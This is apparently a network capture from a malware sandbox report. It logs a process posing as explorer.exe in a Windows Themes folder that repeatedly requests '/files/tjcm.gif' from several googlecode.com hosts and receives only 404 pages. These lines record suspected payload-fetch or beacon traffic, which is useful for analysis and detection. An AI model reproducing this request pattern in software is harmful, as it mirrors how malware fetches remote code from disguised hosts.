Sep 2, 2024 14:24:57.805295944 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:57 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:57.805310965 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49746	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:58.523514986 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:59.391241074 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:59 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:59.391280890 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Sep 2, 2024 14:24:59.391443014 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49747	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:59.914896011 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:00.600761890 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:00 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:00.600785971 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49748	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:01.199155092 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:01.884839058 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:01 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:01.884866953 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49749	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:02.509087086 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:03.189096928 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:03 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:03.189121008 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49750	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:03.764422894 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:04.448973894 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:04 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:04.449003935 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49751	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:05.046881914 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:05.739490032 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:05 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:05.739528894 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49752	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:06.234532118 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:06.918756962 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:06 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 